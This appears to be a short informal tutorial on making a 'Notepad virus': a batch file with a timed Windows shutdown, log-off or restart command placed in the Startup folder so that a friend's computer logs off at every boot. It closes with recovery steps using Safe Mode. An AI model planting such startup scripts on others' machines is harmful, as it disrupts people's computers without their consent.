A Notepad Virus Program to Restart the Computer at Every Startup

hi friends now i teach how to restart the computer at every startup with notepad
steps:
1: Open the notepad
2: Type the following command
shutdown  -l    -t  10
3: Save that notepad with any name with extension .bat
4: Double click the batch file and then cut the file and copy to the startup floder
Now see when your friend restart the system it automatically  Log off
shutdown -s  -t   10 = Shutdown the system
shutdown -r  -t  10=Restart the system
HOW  TO RECOVER  FROM  THIS  VIRUS  PROGRAM :
1: Boot the system in Safe mod
2:Delete the batch file from the startup floder
